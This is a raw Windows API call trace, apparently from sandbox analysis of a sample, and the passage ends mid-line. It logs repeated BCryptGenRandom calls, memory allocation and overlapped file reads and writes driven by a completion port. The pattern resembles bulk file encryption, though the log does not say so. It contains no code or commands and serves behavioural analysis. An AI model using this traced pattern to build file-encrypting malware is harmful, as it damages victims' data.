[0087.379] free (_Block=0x1ff1930) [0087.379] free (_Block=0x1ff1a40) [0087.379] free (_Block=0x77d908) [0087.379] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0087.380] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0087.390] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.390] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0087.393] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.394] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.394] free (_Block=0x77d800) [0087.394] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.394] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.394] free (_Block=0x1ff1930) [0087.394] free (_Block=0x1ff1a40) [0087.394] free (_Block=0x77d908) [0087.394] WriteFile (in: hFile=0x3c4, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0087.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.429] CloseHandle (hObject=0x3bc) returned 1 [0087.436] free (_Block=0x1ff1e60) [0087.436] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.617] CloseHandle (hObject=0x3c8) returned 1 [0087.618] free (_Block=0x3e700e8) [0087.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.631] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.632] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.633] CloseHandle (hObject=0x3a0) returned 1 [0087.633] free (_Block=0x3e30078) [0087.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.634] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x5480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.806] CloseHandle (hObject=0x3c8) returned 1 [0087.806] free (_Block=0x3e700e8) [0087.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.819] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xca60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.840] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0087.840] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.859] ReadFile (in: hFile=0x3c8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0087.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.879] ReadFile (in: hFile=0x3ac, lpBuffer=0x3eb00ac, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3eb0078 | out: lpBuffer=0x3eb00ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3eb0078) returned 1 [0087.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.887] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0088.227] CloseHandle (hObject=0x3a0) returned 1 [0088.227] free (_Block=0x1fb18c0) [0088.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0088.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0088.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0088.253] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.253] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.253] free (_Block=0x77d800) [0088.253] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0088.253] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0088.254] free (_Block=0x1ff1930) [0088.254] free (_Block=0x1ff1a40) [0088.254] free (_Block=0x77d908) [0088.254] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0088.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0088.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.265] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0088.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0088.266] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.266] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.266] free (_Block=0x77d800) [0088.266] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0088.266] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0088.267] free (_Block=0x1ff1930) [0088.267] free (_Block=0x1ff1a40) [0088.267] free (_Block=0x77d908) [0088.267] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0088.267] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0088.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0088.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0088.354] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.354] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.354] free (_Block=0x77d800) [0088.354] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0088.354] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0088.357] free (_Block=0x2071f40) [0088.357] free (_Block=0x2072050) [0088.357] free (_Block=0x77d908) [0088.361] WriteFile (in: hFile=0x3ac, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0088.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0088.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0088.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0088.773] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.773] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.773] free (_Block=0x77d800) [0088.773] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0088.773] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0088.773] free (_Block=0x1ff1930) [0088.773] free (_Block=0x1ff1a40) [0088.773] free (_Block=0x77d908) [0088.773] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0088.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0089.335] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xdbe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0089.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0089.375] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc2f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0089.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0095.351] CloseHandle (hObject=0x1194) returned 1 [0095.351] free (_Block=0x3df0128) [0095.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0096.280] CloseHandle (hObject=0x334) returned 1 [0096.280] free (_Block=0x1ff1e60) [0096.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0096.281] WriteFile (in: hFile=0x13e0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0096.282] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0096.283] CloseHandle (hObject=0x1194) returned 1 [0096.288] free (_Block=0x3d70048) [0096.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0096.289] CloseHandle (hObject=0x330) returned 1 [0096.289] free (_Block=0x3db00b8) [0096.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.202] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0097.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.208] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0097.213] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0097.213] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0097.213] free (_Block=0x3df0008) [0097.213] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0097.213] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0097.213] free (_Block=0x3df0008) [0097.214] free (_Block=0x2071818) [0097.214] free (_Block=0x77d800) [0097.214] WriteFile (in: hFile=0x13e4, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0097.214] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.214] WriteFile (in: hFile=0x13e4, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0097.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.289] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6c2b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0097.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.352] ReadFile (in: hFile=0x1194, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1c5d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0097.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.519] WriteFile (in: hFile=0x3a8, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x37a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0097.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.543] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xca00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0097.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.568] CloseHandle (hObject=0x1194) returned 1 [0097.568] free (_Block=0x3d70048) [0097.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.583] ReadFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13600, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0097.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.611] CloseHandle (hObject=0x3b0) returned 1 [0097.613] free (_Block=0x1ff1e60) [0097.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.627] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0097.631] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.634] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0097.634] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.634] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.634] free (_Block=0x77d800) [0097.634] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.634] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.635] free (_Block=0x2071818) [0097.635] free (_Block=0x2071928) [0097.635] free (_Block=0x77d908) [0097.635] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0097.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.645] CloseHandle (hObject=0x3b4) returned 1 [0097.645] free (_Block=0x3ef0008) [0097.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.669] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0097.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0097.672] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.672] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.672] free (_Block=0x77d800) [0097.672] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.672] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.673] free (_Block=0x2071818) [0097.673] free (_Block=0x2071928) [0097.673] free (_Block=0x77d908) [0097.673] WriteFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, 